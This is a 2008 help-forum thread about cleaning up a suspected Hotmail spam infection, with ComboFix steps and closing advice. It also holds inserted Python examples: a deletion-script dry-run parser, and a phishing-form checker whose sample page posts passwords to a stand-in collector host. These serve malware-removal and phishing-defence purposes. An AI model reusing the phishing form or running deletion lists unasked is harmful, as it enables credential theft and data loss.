#1, 10th January 2008, 06:31 PM
Taxboy (Newcomer; joined Jan 2008, 3 posts)
[SOLVED] Possible Hotmail Virus

Here's my original post over on Birdforum.net

I try to keep my machine protected & update regularly - AVG Antivirus, AVG Spyware, Windows Defender, Ad-Aware & Spybot. I have run these through & found nothing but have discovered that my hotmail has sent spam to everyone in my hotmail address book advertising a youpwtr.com address. I haven't visited the site & deliberately didn't link here for obvious reasons.

This looks like a virus but my machine tests clean and only e-mails from my web based mail were sent - not my private outlook mail.

Does anyone have any ideas what might have happened? Following a suggestion from Howard, I have now completed all the steps here: http://techsupportteam.org/forum/showthread.php?t=43

I have attached the logs. The only problem I had was with the AVG Anti-Spyware: the first time I ran it I could not get a report created, so I repeated the test and got a nil report. However, the only things it found were tracking cookies, rated medium originally. I'm hoping that I'm not infected, but any confirmation either way would be very much appreciated.

TIA

Andrew

Last edited by Howard; 16th January 2008 at 07:40 PM. Reason: Removed attachments.
#2, 10th January 2008, 06:53 PM
evilfantasy (Security Team; joined Dec 2007, 2,555 posts; Tulsa, OK)
Uninstall combofix and reinstall it to the DESKTOP as the instructions stated please.




Delete these files/folders, as follows:

1. Please open Notepad (it must be Notepad, not WordPad).
  • Click Start, then Run
  • Type notepad.exe in the Run box.
2. Copy the text below by highlighting all the text and pressing Ctrl+C

Quote:
Folder::
C:\VundoFix Backups

File::
C:\WINDOWS\system32\tmp.reg
C:\WINDOWS\system32\VCCLSID.exe
C:\WINDOWS\system32\SrchSTS.exe
C:\WINDOWS\system32\IEDFix.exe
C:\WINDOWS\system32\Process.exe
C:\WINDOWS\system32\dumphive.exe
C:\WINDOWS\system32\WS2Fix.exe
3. Go to the Notepad window and click Edit > Paste
4. Then click File > Save
5. Name the file CFScript.txt - Save the file to your Desktop
6. Then drag the CFScript (hold the left mouse button while dragging the file) and drop it (release the left mouse button) into ComboFix.exe as you see in the screenshot below. Important: Perform this instruction carefully!



ComboFix will begin to execute, just follow the prompts. After reboot (in case it asks to reboot), it will produce a log for you. Post that log (Combofix.txt) in your next reply.

Note: Do not mouse-click ComboFix's window while it is running. That may cause your system to freeze.

---------------

Open HijackThis and select Do a system scan only then place a check mark next to:

O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)

Close all windows except for HijackThis and click Fix checked

Exit Hijackthis.

---------------

Run ATF Cleaner.

Please download ATF Cleaner by Atribune. ATF Cleaner.exe

Make sure that all browser windows are closed.
  • Double-click ATF-Cleaner.exe to run the program.
  • Under Main choose: Select All and UNCHECK Cookies.
  • Click the Empty Selected button.

If you use Firefox browser
  • Click Firefox at the top and choose: Select All and UNCHECK Cookies.
  • Click the Empty Selected button.
    NOTE: If you would like to keep your saved passwords, please click No at the prompt.

If you use Opera browser
  • Click Opera at the top and choose: Select All and UNCHECK Cookies.
  • Click the Empty Selected button.
    NOTE: If you would like to keep your saved passwords, please click No at the prompt.

Click Exit on the Main ATF Cleaner menu to close the program.

---------------

Next post please attach
Combofix log
New Hijackthis log
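The CFScript above is a list of paths that ComboFix will delete on the poster's behalf, and the thread's warning to follow it carefully exists because a wrong line does real damage. The following is an added example for this thread, not ComboFix's own code: a dry-run parser for the Folder::/File:: format the post uses, so a script pasted from a forum can be reviewed before anything is removed. It knows only the two directives the post contains; any other "Name::" header is reported as unsupported rather than acted on, and the refusal rules for drive roots and the Windows directory are an assumed policy of this example, not ComboFix behaviour.

```python
"""Dry-run parser for the ComboFix CFScript format used in the post above.

Added example for this thread, not ComboFix's own code. It understands only
the two directives the script above contains, ``Folder::`` and ``File::``;
anything else is reported as unsupported instead of being acted on, and drive
roots or the Windows directory itself are refused (assumed policy), so a
script pasted from a forum cannot quietly do more than the reader reviewed.
"""
import ntpath
import os
import shutil

SUPPORTED = ("Folder", "File")

# Constructed sample: the same kind of entries the post lists, abbreviated.
SAMPLE_CFSCRIPT = """\
Folder::
C:\\VundoFix Backups

File::
C:\\WINDOWS\\system32\\tmp.reg
C:\\WINDOWS\\system32\\VCCLSID.exe
"""


def parse_cfscript(text):
    """Split a CFScript into {"Folder": [...], "File": [...], "unsupported": {...}}."""
    plan = {"Folder": [], "File": [], "unsupported": {}}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith("::") and " " not in line:      # a directive header
            section = line[:-2]
            if section not in SUPPORTED:
                plan["unsupported"].setdefault(section, [])
            continue
        if section is None:
            raise ValueError(f"entry before any directive header: {line!r}")
        if section in SUPPORTED:
            plan[section].append(line)
        else:
            plan["unsupported"][section].append(line)
    return plan


def is_safe_target(path):
    """Assumed safety policy (not ComboFix's): refuse drive roots and the Windows
    directory or its immediate children, where a typo would gut the system."""
    drive, rest = ntpath.splitdrive(path)
    parts = [p for p in rest.replace("/", "\\").split("\\") if p]
    if not drive or not parts:
        return False
    if parts[0].upper() == "WINDOWS" and len(parts) < 3:
        return False
    return True


def apply_plan(plan, dry_run=True, exists=os.path.exists):
    """Return (kind, path, outcome) triples; deletes only when dry_run is False."""
    actions = []
    for kind in SUPPORTED:
        for path in plan[kind]:
            if not is_safe_target(path):
                actions.append((kind, path, "refused"))
                continue
            if not exists(path):
                actions.append((kind, path, "missing"))
                continue
            if dry_run:
                actions.append((kind, path, "would-delete"))
                continue
            try:
                (shutil.rmtree if kind == "Folder" else os.remove)(path)
                actions.append((kind, path, "deleted"))
            except OSError as err:
                actions.append((kind, path, f"error: {err}"))
    for section, entries in plan["unsupported"].items():
        for path in entries:
            actions.append((section, path, "unsupported"))
    return actions


if __name__ == "__main__":
    for action in apply_plan(parse_cfscript(SAMPLE_CFSCRIPT)):
        print(*action)
```

Run it with the default dry_run=True first and read the "would-delete" lines; only when every path is one you expect to lose should you call apply_plan(plan, dry_run=False). The exists hook is there so the plan can be checked against a recorded directory listing from the affected machine without running anything on it.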
#3, 11th January 2008, 02:27 AM
Howard (TST Master; joined Dec 2007, 3,366 posts)
Hello and welcome to TST.

I`m sorry I wasn`t around when you posted. However, you`re in very good hands with Evilfantasy.

Regards Howard
#4, 13th January 2008, 08:09 AM
Backyard (TST Member; joined Jan 2008, 141 posts; NSW, Australia)
There is a site circulating somewhere that pretends to be Hotmail. When you log in, it will redirect you to the real Hotmail site and ask you to log in again because the e-mail and password were incorrect!
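Backyard's description fits a credential-phishing page rather than malware: the machine scans clean because nothing was installed, and the forward to the real site afterwards means the victim sees no error. The check that catches it is on the login form itself, before anything is submitted. Below is an added example for this thread, not code from the post or from any webmail provider: it parses a page's forms and flags a password form that posts to a host other than the expected one, over plain http, or by GET. The hostnames are placeholders (mail.example.com stands in for the real login host; the other domains are constructed to play the look-alike site).

```python
"""Check whether a login page's credential form posts where it should.

Added example for this thread (not code from the post or any webmail
provider). ``mail.example.com`` is a placeholder for the real login host and
the other domains are constructed to play the phishing site. A look-alike page
that forwards the victim to the real site afterwards produces no visible
error, so the check looks at the form itself rather than at what happens
after submit.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collect every <form> with its action, method and whether it has a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").lower(),
                          "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def _same_site(host, expected):
    return host == expected or host.endswith("." + expected)


def check_login_page(page_url, html, expected_host):
    """Return a list of findings; an empty list means the page is on expected_host
    and every password form on it posts over https to expected_host (or a subdomain)."""
    scanner = _FormScanner()
    scanner.feed(html)
    findings = []
    page_host = urlsplit(page_url).hostname or ""
    if not _same_site(page_host, expected_host):
        findings.append(f"page served from {page_host}, not {expected_host}")
    for form in scanner.forms:
        if not form["password"]:
            continue
        target = urlsplit(urljoin(page_url, form["action"]))
        host = target.hostname or page_host
        if not _same_site(host, expected_host):
            findings.append(f"password form posts to {host}, not {expected_host}")
        if target.scheme != "https":
            findings.append(f"password form submitted over {target.scheme}, not https")
        if form["method"] != "post":
            findings.append("password form uses GET, so the password ends up in URLs and logs")
    return findings


# Constructed samples: a look-alike page and a legitimate one (placeholder hosts).
PHISHING_URL = "http://hotmail-login.example/signin"
PHISHING_HTML = """
<form method="post" action="http://collector.example/grab.php">
  <input name="login"><input type="password" name="passwd">
  <input type="submit" value="Sign in">
</form>"""

LEGIT_URL = "https://mail.example.com/login"
LEGIT_HTML = """
<form method="post" action="/ppsecure/post">
  <input name="login"><input type="password" name="passwd">
</form>"""


if __name__ == "__main__":
    for url, html in ((PHISHING_URL, PHISHING_HTML), (LEGIT_URL, LEGIT_HTML)):
        print(url, "->", check_login_page(url, html, "mail.example.com") or ["ok"])
```

The page-host check matters as much as the form-action check: a phishing kit usually posts to its own relative path, so the form looks same-origin, and only the fact that the origin is the look-alike domain gives it away. Whatever the tool says, the practical response to webmail spam from a clean machine is to change the webmail password from a known-good device and review any forwarding rules on the account.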
#5, 13th January 2008, 02:01 PM
Taxboy (Newcomer; joined Jan 2008, 3 posts)
Hi

Thanks for the welcome and assistance - it's very much appreciated.

As requested, please find the ComboFix log and HijackThis log attached.

Last edited by Howard; 16th January 2008 at 07:40 PM. Reason: Removed attachments.
#6, 13th January 2008, 04:21 PM
evilfantasy (Security Team; joined Dec 2007, 2,555 posts; Tulsa, OK)
The logs now look fine.

How is the computer?
#7, 13th January 2008, 06:04 PM
Taxboy (Newcomer; joined Jan 2008, 3 posts)

It seems to be working a bit quicker.

Thanks for your help; your time is much appreciated.

Last edited by Howard; 13th January 2008 at 06:06 PM. Reason: Removed quote.
#8, 13th January 2008, 06:09 PM
evilfantasy (Security Team; joined Dec 2007, 2,555 posts; Tulsa, OK)
Closing steps.

Go to Start > Run and copy and paste the following command into the field:

ComboFix /u

Make sure there's a space between ComboFix and /u, then hit Enter.

This will uninstall ComboFix, delete its related folders and files, reset your clock settings, hide file extensions, hide the system/hidden files again and reset System Restore.

----------

Let's clear out the programs we've been using to clean up your computer; they are not suitable for general malware removal and could cause damage if launched accidentally.

Please download OTMoveIt2 by OldTimer OTMoveIt2.exe and place it on your desktop.

1. Double click OTMoveIt2.exe to launch it.
2. Click on the CleanUp! button.
3. OTMoveIt2 will download a list from the Internet, if your firewall or other defensive programs alerts you, allow it access.
4. Click YES at the next prompt (list downloaded, Do you want to begin cleanup process?)
  • When finished exit out of OTMoveIt2

----------

To learn more about how to protect yourself while on the internet, read this article by Tony Klein: So how did I get infected in the first place?



Let us know if anything else comes up.
#9, 13th January 2008, 11:03 PM
Howard (TST Master; joined Dec 2007, 3,366 posts)
This thread is now closed. If you need this thread unlocked, please PM a moderator with a link to the thread.

Only the original thread starter can do this. Anyone else will be ignored.

Regards Howard
#10, 13th January 2008, 11:07 PM
evilfantasy (Security Team; joined Dec 2007, 2,555 posts; Tulsa, OK)
Oops.

I'm going to have to remember the solved threads part.
#11, 13th January 2008, 11:08 PM
Howard (TST Master; joined Dec 2007, 3,366 posts)
Hehe, I forget too sometimes mate.

Regards Howard